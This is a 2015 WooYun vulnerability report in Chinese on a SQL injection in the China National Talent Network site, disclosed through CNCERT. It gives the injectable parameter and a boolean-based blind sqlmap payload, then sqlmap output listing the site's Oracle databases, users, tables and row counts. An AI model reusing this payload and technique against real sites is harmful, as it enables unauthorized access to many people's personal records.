当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142861

漏洞标题:中国国家人才网某处SQL注入漏洞可泄露几十万用户信息

相关厂商:中国国家人才网

漏洞作者: 路人甲

提交时间:2015-09-24 11:35

修复时间:2015-11-13 09:08

公开时间:2015-11-13 09:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:14

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-29: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-09: 细节向核心白帽子及相关领域专家公开
2015-10-19: 细节向普通白帽子公开
2015-10-29: 细节向实习白帽子公开
2015-11-13: 细节向公众公开

简要描述:

中国国家人才网某处注入漏洞,泄露几十万用户信息。。。。。。

详细说明:

注入链接:http://**.**.**.**/party/listAction!listTB_XXFB_Djkw.action?type=djkw_type
直接SQLMAP 跑出大量数据,国家人才网的数据啊。。。。。。。。。。
几十万信息数据。。。。
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| TB_CWGL_PAY | 369101 |
| TB_DAGL_DOCINFO | 120601 |
| TEMP | 113446 |
| TB_GGGL_BH | 36238 |
| TB_DYGL_INFO | 11561 |
| TB_DYGL_INFO_EAST | 8103 |
| BIL_ACCOUNT | 1143 |
| SY_S_ROLEFUNCTIONS | 742 |
| SY_D_FUNCTION | 534 |

sqlmap identified the following injection points with a total of 0 HTTP(s) 
reque
sts:
---
Place: GET
Parameter: type
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=djkw_type' AND 2134=2134 AND 'sfvD'='sfvD
---
[21:50:44] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
available databases [22]:
[*] BJEPN_PARTY_QGRC
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EPN_QGRC
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
web application technology: JSP
back-end DBMS: Oracle
[20:17:35] [INFO] fetching database users privileges
[20:17:35] [INFO] fetching database users
[20:17:35] [INFO] fetching number of database users
[20:17:35] [INFO] resumed: 29
[20:17:35] [INFO] resuming partial value: BJEPN_
[20:17:35] [WARNING] running in a single-thread mode. Please co
ption '--threads' for faster data retrieval
[20:17:35] [INFO] retrieved: PARTY_QGRC
[20:18:24] [INFO] retrieved: BI
[20:18:36] [INFO] retrieved: PM
[20:18:49] [INFO] retrieved: SH
[20:19:02] [INFO] retrieved: IX
[20:19:15] [INFO] retrieved: OE
[20:19:29] [INFO] retrieved: HR
[20:19:43] [INFO] retrieved: SCOTT
[20:20:11] [INFO] retrieved: MGMT_VIEW
[20:20:58] [INFO] retrieved: EPN_QGRC
[20:21:40] [INFO] retrieved: MDDATA
[20:22:11] [INFO] retrieved: SYSMAN
[20:22:42] [INFO] retrieved: MDSYS
[20:23:09] [INFO] retrieved: SI_INFORMTN_SCHEMA
[20:24:47] [INFO] retrieved: ORDPLUGINS
[20:25:39] [INFO] retrieved: ORDSYS
[20:26:12] [INFO] retrieved: OLAPSYS
[20:26:49] [INFO] retrieved: ANONYMOUS
[20:27:35] [INFO] retrieved: XDB
[20:27:58] [INFO] retrieved: CTXSYS
[20:28:31] [INFO] retrieved: EXFSYS
[20:29:03] [INFO] retrieved: WMSYS
[20:29:32] [INFO] retrieved: DBSNMP
[20:30:07] [INFO] retrieved: TSMSYS
[20:30:40] [INFO] retrieved: DMSYS
[20:31:08] [INFO] retrieved: DIP
[20:31:26] [INFO] retrieved: OUTLN
[20:31:53] [INFO] retrieved: SYSTEM
[20:32:25] [INFO] retrieved: SYS
current schema (equivalent to database on Oracle):    'BJEPN_PARTY_QGRC'
current user:    'BJEPN_PARTY_QGRC'


2.png


3.png


4.jpg


漏洞证明:

Database: BJEPN_PARTY_QGRC
[44 tables]
+---------------------+
| A1                  |
| A_TEMP              |
| BIL_ACCOUNT         |
| RECEIPTLIST         |
| SY_A_SETTING        |
| SY_D_COMROLE        |
| SY_D_FUNCTION       |
| SY_D_LOG            |
| SY_D_PARA           |
| SY_D_PARATYPE       |
| SY_D_PARATYPEV      |
| SY_D_PARAV          |
| SY_D_PORTAL         |
| SY_D_PORTALUSER     |
| SY_D_ROLE           |
| SY_D_USER           |
| SY_D_USERV          |
| SY_S_ROLEFUNCTIONS  |
| SY_S_USERROLES      |
| TB_CWGL_PAY         |
| TB_DAGL_DOCINFO     |
| TB_DYGL_ARTICLE     |
| TB_DYGL_EMAIL       |
| TB_DYGL_INFO        |
| TB_DYGL_INFO_EAST   |
| TB_DYGL_LOG         |
| TB_DYGL_MESSAGE     |
| TB_DYGL_RECORD      |
| TB_DYGL_SIGNUP      |
| TB_DYGL_ZBINFO      |
| TB_DYGL_ZBINFO_EAST |
| TB_GGGL_BEIJING     |
| TB_GGGL_BH          |
| TB_GGGL_HY          |
| TB_GGGL_ZY          |
| TB_UPLOAD           |
| TB_XTGL_DEPT        |
| TB_XTGL_POST        |
| TB_XXFB_ABOUTUS     |
| TB_XXFB_ACTIVE      |
| TB_XXFB_NEWS        |
| TB_XXFB_ZXZX        |
| TB_ZHGL_VIP         |
| TEMP                |
+---------------------+
Database: BJEPN_PARTY_QGRC
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| TB_CWGL_PAY         | 369101  |
| TB_DAGL_DOCINFO     | 120601  |
| TEMP                | 113446  |
| TB_GGGL_BH          | 36238   |
| TB_DYGL_INFO        | 11561   |
| TB_DYGL_INFO_EAST   | 8103    |
| BIL_ACCOUNT         | 1143    |
| SY_S_ROLEFUNCTIONS  | 742     |
| SY_D_FUNCTION       | 534     |
| TB_GGGL_BEIJING     | 399     |
| TB_DYGL_LOG         | 358     |
| SY_D_PARAV          | 300     |
| TB_GGGL_ZY          | 300     |
| TB_DYGL_ZBINFO      | 248     |
| TB_XXFB_NEWS        | 218     |
| TB_GGGL_HY          | 136     |
| A_TEMP              | 117     |
| TB_DYGL_ZBINFO_EAST | 98      |
| TB_UPLOAD           | 84      |
| TB_ZHGL_VIP         | 80      |
| SY_D_USERV          | 50      |
| SY_D_PARATYPEV      | 40      |
| TB_XXFB_ACTIVE      | 33      |
| SY_D_USER           | 32      |
| SY_D_PARA           | 31      |
| TB_XTGL_POST        | 31      |
| SY_S_USERROLES      | 27      |
| SY_D_ROLE           | 21      |
| SY_D_PARATYPE       | 20      |
| TB_XXFB_ZXZX        | 19      |
| TB_XTGL_DEPT        | 17      |
| SY_D_PORTAL         | 15      |
| SY_A_SETTING        | 13      |
| TB_DYGL_ARTICLE     | 8       |
| TB_DYGL_MESSAGE     | 5       |
| TB_DYGL_SIGNUP      | 5       |
| SY_D_PORTALUSER     | 4       |
| TB_XXFB_ABOUTUS     | 4       |
| SY_D_COMROLE        | 3       |
| SY_D_LOG            | 3       |
+---------------------+---------+


5.png


6.png


具体就不深入了。。。。。。。

修复方案:

你懂的。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-29 09:07

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向人力资源和社会保障部主管部门上报,由其后续协调网站管理单位处置.

最新状态:

暂无